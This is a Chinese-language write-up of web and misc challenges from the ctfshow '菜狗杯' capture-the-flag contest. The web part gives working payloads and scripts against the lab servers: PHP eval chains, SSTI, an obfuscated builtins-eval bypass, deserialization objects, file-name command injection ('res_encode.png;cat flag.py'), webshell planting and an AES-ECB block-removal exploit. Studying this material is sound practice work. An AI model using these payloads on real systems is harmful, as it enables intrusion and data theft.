ctfshow菜狗杯

2024-01-04

ctf

字数统计: 4.7k | 阅读时长≈ 24 分钟

web

web签到

1	eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

web2 c0me_t0_s1gn

我的眼里只有$

1 2	extract($_POST); eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);

extract():将数组中变量导入到符号表，extract(array(“a” => “Cat”))等价于$a=”Cat”

传入POST的时候本来就会将POST内容作为数组传入，本质其实就是

$arr = ["_"=>"a","a"=>"b","b"=>"c","c"=>"d","d"=>"e","e"=>"f","f"=>"g","g"=>"h","h"=>"i","i"=>"j","j"=>"k","k"=>"l","l"=>"m","m"=>"n","n"=>"o","o"=>"p","p"=>"q","q"=>"r","r"=>"s","s"=>"t","t"=>"u","u"=>"v","v"=>"w","w"=>"x","x"=>"y","y"=>"z","z"=>"aa","aa"=>"bb","bb"=>"cc","cc"=>"dd","dd"=>"xx","xx"=>"yy","yy"=>"ta","ta"=>"ad","ad"=>"bba","bba"=>"sh","sh"=>"ls"]

太麻烦了，写个爆破脚本，由于php中变量名开头必须是字母或者_，就手动加一下

import request
url = "http://localhost:9090/"
data = "_=_0&"
code = "_34=system('cat /f*')"
for i in range(0,34):
    data = data + "_" +str(i) + "=" + "_" + str(i+1) + "&"
data = data + code
print(data)
r = requests.post(url=url,data=data)
print(r.text)

结果就是

?_=_0&_0=_1&_1=_2&_2=_3&_3=_4&_4=_5&_5=_6&_6=_7&_7=_8&_8=_9&_9=_10&_10=_11&_11=_12&_12=_13&_13=_14&_14=_15&_15=_16&_16=_17&_17=_18&_18=_19&_19=_20&_20=_21&_21=_22&_22=_23&_23=_24&_24=_25&_25=_26&_26=_27&_27=_28&_28=_29&_29=_30&_30=_31&_31=_32&_32=_33&_33=_34&_34=system("cat /f*");

抽老婆

一眼路径，随便试一下有报错app.py

/download?file=../../app.py拿到源代码+sk，直接session伪造

1	python3 flask_session_cookie_manager3.py encode -s 'tanji_is_A_boy_Yooooooooooooooooooooo!' -t '{"isadmin":"True"}'

一言既出

if (isset($_GET['num'])){
    if ($_GET['num'] == 114514){
        assert("intval($_GET[num])==1919810") or die("一言既出，驷马难追!");
        echo $flag;
    } 
}

学到了，弱比较比较数字，只会比对单数字的部分，assert里可以直接视作php语句，所以可以用);//闭合然后把后面的die注释掉

1	?num=114514);//

驷马难追

if (isset($_GET['num'])){
     if ($_GET['num'] == 114514 && check($_GET['num'])){
              assert("intval($_GET[num])==1919810") or die("一言既出，驷马难追!");
              echo $flag;
     } 
} 

function check($str){
  return !preg_match("/[a-z]|\;|\(|\)/",$str);
}

本地php版本应该有问题，assert不管怎么样都是true

但是这个intval是可以用+-*/的

1	?num=114514%2b1805296(+编码为%2b)

TapTapTap

Webshell

class Webshell {
    public $cmd = 'echo "Hello World!"';

    public function __construct() {
        $this->init();
    }

    public function init() {
        if (!preg_match('/flag/i', $this->cmd)) {
            $this->exec($this->cmd);
        }
    }

    public function exec($cmd) {
        $result = shell_exec($cmd);
        echo $result;
    }
}

ez反序列化

1	?cmd=O:8:"Webshell":1:{s:3:"cmd";s:15:"cat f* \| base64";}

化零为整

$result='';

for ($i=1;$i<=count($_GET);$i++){
    if (strlen($_GET[$i])>1){
        die("你太长了！！");
        }
    else{
    $result=$result.$_GET[$i];
    }
}

if ($result ==="大牛"){
    echo $flag;
}

挺有意思的，在php中，一个中文字的len是3，所以要把一个中文拆成三分然后通过 . 拼接起来。但是一直不知道要怎么拆分，看了wp才知道是用url编码，所以就是

1	?1=%E5&2=%A4&3=%A7&4=%E7&5=%89&6=%9B

无一幸免

if (isset($_GET['0'])){
    $arr[$_GET['0']]=1;
    if ($arr[]=1){
        die($flag);
    }
    else{
        die("nonono!");
    }
}

啊？

?0

其实是题目有问题，本来应该是

if ($arr[]=1){
        die($flag);
    }
    else{
        die("nonono!");
    }

这样对$arr[]进行一个赋值，如果不进行特殊操作是恒为真的，所以要让这个赋值操作中断

中断原理就是

索引数组最大下标等于最大int数，对其追加会导致整型数溢出，进而引起追加失败
int范围查阅Manual可知：32位最大是231-1，64位是263-1
也就是2147483647与9223372036854775807
https://blog.csdn.net/Xxy605/article/details/120049069

1	?0=9223372036854775807

传说之下（雾）

学到了，本地修改game.js文件，赢一次+2078分，吃一个就能拿flag

算力超群

随便算个数，进去把5改成7*7有正确回显49，那就是ssti

1	?number1=&operator=&number2=__import__("os").popen("cat /f*").read()

算力升级

@app.route('/tiesuanzi', methods=['POST'])
def tiesuanzi():
    code=request.form.get('code')
    for item in pattern.findall(code):#从code里把单词拿出来
        if not re.match(r'\d+$',item):#如果不是数字
            if item not in dir(gmpy2):#逐个和gmpy2库里的函数名比较
               return jsonify({"result":1,"msg":f"你想干什么？{item}不是有效的函数"})
    try:
        result=eval(code)
        return jsonify({"result":0,"msg":f"计算成功，答案是{result}"})
    except:
        return jsonify({"result":1,"msg":f"没有执行成功，请检查你的输入。"})

限制是实用的关键字只能是gmpy2中的函数名

1
2

>>> dir(gmpy2)
['Default', 'DivisionByZeroError', 'HAVE_THREADS', 'InexactResultError', 'InvalidOperationError', 'OverflowResultError', 'RangeError', 'RoundAwayZero', 'RoundDown', 'RoundToNearest', 'RoundToZero', 'RoundUp', 'UnderflowResultError', '_C_API', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__path__', '__spec__', '_mpmath_create', '_mpmath_normalize', 'acos', 'acosh', 'add', 'agm', 'ai', 'asin', 'asinh', 'atan', 'atan2', 'atanh', 'bincoef', ……]

可见，有一个__builtins__可以使用，而从gmpy2.__builtins__里有eval函数

s="__import__('os').popen('cat /flag').read()"

import gmpy2

payload="gmpy2.__builtins__['erf'[0]+'div'[2]+'ai'[0]+'lcm'[0]]("
##'erf'[0]+'div'[2]+'ai'[0]+'lcm'[0]==eval

for i in s:
        if i not in "/'(). ":
                temp_index=0
                temp_string='x'*20
                for j in dir(gmpy2):
                        if j.find(i)>=0:
                                if len(j)<len(temp_string):
                                        temp_string=j
                                        temp_index=j.find(i)
                payload+=f'\'{temp_string}\'[{temp_index}]+'
        else:
                payload+=f'\"{i}\"+'

payload=payload[:-1]+')'

print(payload)

gmpy2.__builtins__['erf'[0]+'div'[2]+'ai'[0]+'lcm'[0]]('c_div'[1]+'c_div'[1]+'ai'[1]+'agm'[2]+'cmp'[2]+'cos'[1]+'erf'[1]+'cot'[2]+'c_div'[1]+'c_div'[1]+"("+"'"+'cos'[1]+'cos'[2]+"'"+")"+"."+'cmp'[2]+'cos'[1]+'cmp'[2]+'erf'[0]+'jn'[1]+"("+"'"+'cmp'[0]+'ai'[0]+'cot'[2]+" "+"/"+'erf'[2]+'lcm'[0]+'ai'[0]+'agm'[1]+"'"+")"+"."+'erf'[1]+'erf'[0]+'ai'[0]+'add'[1]+"("+")")

easyPytHon_P

from flask import request
cmd: str = request.form.get('cmd')
param: str = request.form.get('param')
# ------------------------------------- Don't modify ↑ them ↑! But you can write your code ↓
import subprocess, os
if cmd is not None and param is not None:
    try:
        tVar = subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5)
        print('Done!')
    except subprocess.TimeoutExpired:
        print('Timeout!')
    except:
        print('Error!')
else:
    print('No Flag!')

传入cmd和param，cmd值截取前三个，__file__表示的是当前py文件的绝对路径

subprocess.run([“ls”,”/“,”/etc”])会同时列出/和/etc的文件

1	cmd=cat&param=/app/flag.txt

遍地飘零

$zeros="000000000000000000000000000000";

foreach($_GET as $key => $value){
    $$key=$$value;
}

if ($flag=="000000000000000000000000000000"){
    echo "好多零";
}else{
    echo "没有零，仔细看看输入有什么问题吧";
    var_dump($_GET);
}

要想var_dump出$flag，必须要让$_GET=$flag => $key=_GET,$value=flag

1	?_GET=flag

茶歇区

有两组，FP=1024-count*score，得分=count*score

看了一下wp，考的是php整形溢出，就只需要先让count取922337203685477580，让后部分溢出为负数，就可以使得整体的FP>114514，在正常买就能让得分>114514

1
2
3

#post 发两次就可以了
#不知道为什么但一个e不行，得多加两个参数
a=152000&b=0&c=0&d=0&e=922337203685477580&submit=%E5%8D%B7%E4%BA%86%E5%B0%B1%E8%B7%91%EF%BC%81

小舔田？

class Moon{
    public $name="月亮";
    public function __toString(){
        return $this->name;
    }
    
    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="牛夫人";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候，叫人家小甜甜！现在新人胜旧人，叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }
    
    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}

if (isset($_GET['code'])){
    unserialize($_GET['code']);

}else{
    $a=new Ion_Fan_Princess();
    echo $a;
}c

印象里做过这个，但具体找不到了

1	?code=O:4:"Moon":1:{s:4:"name";O:16:"Ion_Fan_Princess":1:{s:8:"nickname";s:9:"小甜甜";}}

LSB探姬

被误导了，以为tsteg.py不但能解密LSB，还能执行其中语句，结果只有解密

# !/usr/bin/env python
# -*-coding:utf-8 -*-
"""
# File       : app.py
# Time       ：2022/10/20 15:16
# Author     ：g4_simon
# version    ：python 3.9.7
# Description：TSTEG-WEB
# flag is in /app/flag.py
"""
from flask import *
import os
#初始化全局变量
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():    
    return render_template('upload.html')
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        try:
            f = request.files['file']
            f.save('upload/'+f.filename)
            cmd="python3 tsteg.py upload/"+f.filename
            result=os.popen(cmd).read()
            data={"code":0,"cmd":cmd,"result":result,"message":"file uploaded!"}
            return jsonify(data)
        except:
            data={"code":1,"message":"file upload error!"}
            return jsonify(data)
    else:
        return render_template('upload.html')
@app.route('/source', methods=['GET'])
def show_source():
    return render_template('source.html')
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=False)

result=os.popen("python3 tsteg.py upload/...;cat flag.py").read()

返回的就是python+cat的内容

1	filename="res_encode.png;cat flag.py"

Is_Not_Obfuscate

题目奇怪

会执行decode之后的input参数，而且robots.txt里

1 2	Disallow: /lib.php?flag=0 Disallow: /plugins

传入flag=1，得到

上面一串O0估计表示加密什么东西，下面的估计就是密文

结合上面的decode，把这一串传入到input中，把action改为test执行，还得url编码一下

header("Content-Type:text/html;charset=utf-8");
include 'lib.php';
if(!is_dir('./plugins/')){
    @mkdir('./plugins/', 0777);
}
//Test it and delete it ！！！
//测试执行加密后的插件代码
if($_GET['action'] === 'test') {
    echo 'Anything is good?Please test it.';
    @eval(decode($_GET['input']));
}

ini_set('open_basedir', './plugins/');
if(!empty($_GET['action'])){
    switch ($_GET['action']){
        case 'pull':
            $output = @eval(decode(file_get_contents('./plugins/'.$_GET['input'])));
            echo "pull success";
            break;
        case 'push':
            $input = file_put_contents('./plugins/'.md5($_GET['output'].'youyou'), encode($_GET['output']));
            echo "push success";
            break;
        default:
            die('hacker!');
    }
}

?>

从

1 2	$output = @eval(decode(file_get_contents('./plugins/'.$_GET['input']))); $input = file_put_contents('./plugins/'.md5($_GET['output'].'youyou'), encode($_GET['output']));

可以看出要先传入output，把文件写到./plugins目录下，文件名是md5后的结果

然后eval执行./plugins/文件名

1 2	?input=&action=push&output=<?php system('cat /f*');?> ?input=2e487432444053a0e4c42d08e42016a8&action=pull&output=

龙珠NFT

完全没思路，玩不明白crypto，直接看wp

根据源码可知，address是用AES的ECB模式加密的

class AESCipher():
    def __init__(self,key):
        self.key = self.add_16(hashlib.md5(key.encode()).hexdigest()[:16])
        self.model = AES.MODE_ECB
        self.aes = AES.new(self.key,self.model)

而明文分组长度是16位，当一组明文相等时，加密后的密文也应该相等

而返回的数值按16位分组后的结果就是

显然round_no是一直递增的，思路就是删掉其中64-80这一行，这就让dragonball随着次数的增加而增加

wp给的exp

import requests
import json
import base64
import random
url='http://xxxxxxxxxxxxxxxxxxxxxx/'


s=requests.session()
username=str(random.randint(1,100000))
print(username)
r=s.get(url+'?username='+username)
responses=[]

for i in range(10):
        r=s.get(url+'find_dragonball')
        responses.append(json.loads(r.text))

for item in responses:
	data=json.dumps({'player_id':item['player_id'],'dragonball':item['dragonball'],'round_no':item['round_no'],'time':item['time']})
        miwen=base64.b64decode(item['address'])
        round_no=item['round_no']
        if round_no in [str(i) for i in range(1,8)]:
                fake_address=miwen[:64]+miwen[80:]
                fake_address=base64.b64encode(fake_address).decode()
                r=s.get(url+'get_dragonball',params={"address":fake_address})

r=s.get(url+'flag')
print(r.text)

misc

杂项签到

唉低能

010搜一下ctfshow

损坏的压缩包

010发现是PNG头，改后缀

谜之栅栏

图片栅栏

你会数数吗

词频统计

alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+- =\\{\\}[]"
strings = open('misc4.txt').read()  # 文件打开处

result = {}
for i in alphabet:
    counts = strings.count(i)
    i = '{0}'.format(i)
    result[i] = counts

res = sorted(result.items(), key = lambda item: item[1], reverse = True)
for data in res:
    print(data)

for i in res:
    flag = str(i[0])
    print(flag[0], end = "")

你会异或吗

逐位异或

input_filename = "misc5.png"  # 输入文件名
output_filename = "output.png"  # 输出文件名

# 打开输入文件以及创建输出文件
with open(input_filename, "rb") as input_file, open(output_filename, "wb") as output_file:
    while True:
        byte = input_file.read(1)  # 逐字节读取输入文件
        if not byte:
            break  # 如果没有更多字节可读，退出循环
        byte_value = ord(byte)  # 将字节转换为整数
        xored_byte = byte_value ^ 0x50  # 对字节进行异或操作
        output_file.write(bytes([xored_byte]))  # 将结果字节写入输出文件

flag一分为二

高度隐写+单文件盲水印

我是谁？？

网上有一把梭脚本，本质是用cv2比对图片

import requests
from lxml import html
import cv2
import numpy as np
import json


url="http://0095371d-eeec-4e9d-929b-046aaeb84249.challenge.ctf.show/"

sess=requests.session()

all_girl=sess.get(url+'/static/all_girl.png').content

with open('all_girl.png','wb')as f:
        f.write(all_girl)

big_pic=cv2.imdecode(np.fromfile('all_girl.png', dtype=np.uint8), cv2.IMREAD_UNCHANGED)
big_pic=big_pic[50:,50:,:]
image_alpha = big_pic[:, :, 3]
mask_img=np.zeros((big_pic.shape[0],big_pic.shape[1]), np.uint8)
mask_img[np.where(image_alpha == 0)] = 255

cv2.imwrite('big.png',mask_img)



def answer_one(sess):
        #获取视频文件
        response=sess.get(url+'/check')
        if 'ctfshow{' in response.text:
                print(response.text)
                exit(0)
        tree=html.fromstring(response.text)
        element=tree.xpath('//source[@id="vsource"]')
        video_path=element[0].get('src')
        video_bin=sess.get(url+video_path).content
        with open('Question.mp4','wb')as f:
                f.write(video_bin)
        #获取有效帧
        video = cv2.VideoCapture('Question.mp4')
        frame=0
        while frame<=55:
                res, image = video.read()
                frame+=1
        #cv2.imwrite('temp.png',image)
        video.release()
        #获取剪影
        image=image[100:400,250:500]
        gray_image=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
        #cv2.imwrite('gray_image.png',gray_image)
        temp = np.zeros((300, 250), np.uint8)
        temp[np.where(gray_image>=128)]=255
        #去白边
        temp = temp[[not np.all(temp[i] == 255) for i in range(temp.shape[0])], :]
        temp = temp[:, [not np.all(temp[:, i] == 255) for i in range(temp.shape[1])]]
        #缩放至合适大小，肉眼大致判断是1.2倍，不一定准
        temp = cv2.resize(temp,None,fx=1.2,fy=1.2)
        #查找位置
        res =cv2.matchTemplate( mask_img,temp,cv2.TM_CCOEFF_NORMED)
        min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
        x,y=int(max_loc[0]/192),int(max_loc[1]/288)#为什么是192和288，因为大图去掉标题栏就是1920*2880
        guess='ABCDEFGHIJ'[y]+'0123456789'[x]
        print(f'guess:{guess}')
        #传答案
        response=sess.get(url+'/submit?guess='+guess)
        r=json.loads(response.text)
        if r['result']:
                print('guess right!')
                return True
        else:
                print('guess wrong!')
                return False

i=1

while i<=31:
        print(f'Round:{i}')
        if answer_one(sess):
                i+=1
        else:
                i=1

You and me

盲水印，不知道为什么一定要在py3的环境才能恢复

1	python bwmforpy3.py decode you.png you_and_me.png flag.png

7.1.05

拿到文件拖进010分析，看到是一个游戏的存档

下游戏，进去提示

*long_flag_in_R&D。*

***R&D******的意思是****Research&Develop*

在游戏中能代表这个含义的，是研发中心。因此我们需要找到研发中心的秘密

可以发现每个研发中心的研发部门的数量都不一样，***将其按照从左下向右上，再行扫描的方式***，可以得到这么一串数字：

***9794598612147726669494087179782678475623253058262173164497949649813569030779924086502049160804***再结合提示

long_to_bytes是一个常用于RSA的函数，用于将数字转成字节，来试一下：

***>>> from Crypto.Util.number import long_to_bytes***

***>>> long _ to_bytes***

***(9794598612147726669494087179782678475623253058262173164497949649813569030779924086502049160804 )b “ \ X01 , x84 ( xfa , xe7 ] FI & x84 ? \ \ \ \ \ \ \ \ \ \ xc1x08\ x03 / \ x9auo \ xc2;ek \ x9ed’***

失败了，那有没有可能是被逆序了？

***>>>long _ to _ bytes***

***(4080619402056804299770309653189469497944613712628503523265748762879717804949666277412168954979)***

*b’}3maG_d00G_0S_s1_baL_ms1lat1paC{wohsftc’*

可以明显看到一个wohsftc，这是被逆序过的ctfshow。再逆序一遍即可得到flag

*ctfshow{Cap1tal1sm_Lab_1s_S0_G00d_Gam3}*